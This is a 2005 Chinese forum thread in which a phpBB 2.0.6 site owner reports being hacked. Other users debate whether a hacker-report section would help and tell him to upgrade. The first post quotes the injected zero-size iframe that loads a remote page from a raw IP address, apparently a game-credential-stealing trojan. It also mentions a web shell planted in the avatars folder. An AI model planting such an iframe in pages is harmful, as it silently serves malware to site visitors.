第 1 頁 (共 2 頁)
[被駭]又被駭了!
發表於 : 2005-03-20 02:09
由 jawa560
版本phpBB2.06
侵入方式:
修改版面分區內容,植入\r
代碼: 選擇全部
<iframe src="http://210.51.23.7/help.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
應該是盜取天堂資料的木馬,真是可惡,看來不升級是不行了!
攔截畫面如下:
![圖檔](http://sail.myweb.hinet.net/use_images/warm.gif)
發表於 : 2005-03-20 02:54
由 jawa560
剛剛又發現大頭照的資料夾裡(images/avatars),發現了一隻木馬程式
._admin.php
XD,竟是一隻類似telnet的程式,原名應該叫myshell, 帳號密碼對了,就可以直接對主機下系統指令! 大家趕快查一查!
![圖檔](http://sail.myweb.hinet.net/use_images/myshell.gif)
發表於 : 2005-03-20 02:57
由 jawa560
恭請站長是否可新增一個駭客通報區,這樣大家才能即時防護自己的系統!
Re: [被駭]又被駭了!
發表於 : 2005-03-20 03:16
由 design
jawa560 寫:版本phpBB2.06
連安全性升級都不在乎的
新增駭客通報區有用嗎
![微笑 :-)](./images/smilies/icon_smile.gif)
發表於 : 2005-03-20 03:43
由 jawa560
樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
發表於 : 2005-03-20 04:32
由 aHfUi
那么你要花1点点时间来升级
还是一直给人家HACK @@?
發表於 : 2005-03-20 05:28
由 jawa560
有沒有空升級,或升級有沒有困難是一回事,駭客事件有沒有收集的價值是另一回事。不過,還是很感謝大家的意見!
發表於 : 2005-03-20 10:16
由 kororinfo
有沒有通報.到最後還是要升級吧
發表於 : 2005-03-20 12:42
由 黑風凱特
不升級安全性更新...
你的站台剛好可以給新手hacker練習用....
快快更新吧....
要不了多少時間的~
發表於 : 2005-03-20 13:59
由 Mac
jawa560 寫:樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
你的邏輯有問題吧?既然沒空維護論壇,那被駭了要怪誰呢?
既然都已經有『公告區』要大家升級 phpBB 都沒用了,你認為『駭客通報區』的成效有多少?
~Mac
發表於 : 2005-03-20 14:30
由 jawa560
對不起,混亂大家的思考了!
我要說的是,被駭是我家的事,我自會解決. 但我希望有駭客事件通報區.
政府雖然可發公報,但五花八門的新聞播報仍然有其收視率!
發表於 : 2005-03-20 14:34
由 godbless
jawa560 寫:那意思就是說,只要政府有發公報,五花八門的新聞播報就沒價值了?
有宣傳價值...
其實有很多時候都是媒體先發播報,然後政府才發公報的...
發表於 : 2005-03-20 20:45
由 design
有安全性更新通知的時候就是有用戶被駭的時後,
這樣還需要什麼駭客通報區?
就拿 phpbb 2.12 來說吧.
http://www.nsfocus.net/index.php?act=se ... ug_id=7464
到處都可以取得C的原始碼或有心人編譯過的工具\r
被駭的情況都一模一樣.
況且竹貓在這個漏洞出來也發了會員通知信
這樣還被駭, 然後再來通報, 不覺得問題是出在自己身上嗎?
發表於 : 2005-03-20 21:03
由 haw
自己不做好論壇的維護
有在多的通報\r
你也只能知道自己即將被哪種木馬hack罷了
升級也不過花個十幾二十分鐘
我想絕對比你去查,去解,去知道那些hack跟木馬還快吧?
思考方向偏差真的頗大喔!
發表於 : 2005-03-21 11:33
由 oscerropper
更新是為自己的論壇系統安全,等你被駭後就得不嘗失,我相信你的作業系統也會定期更新吧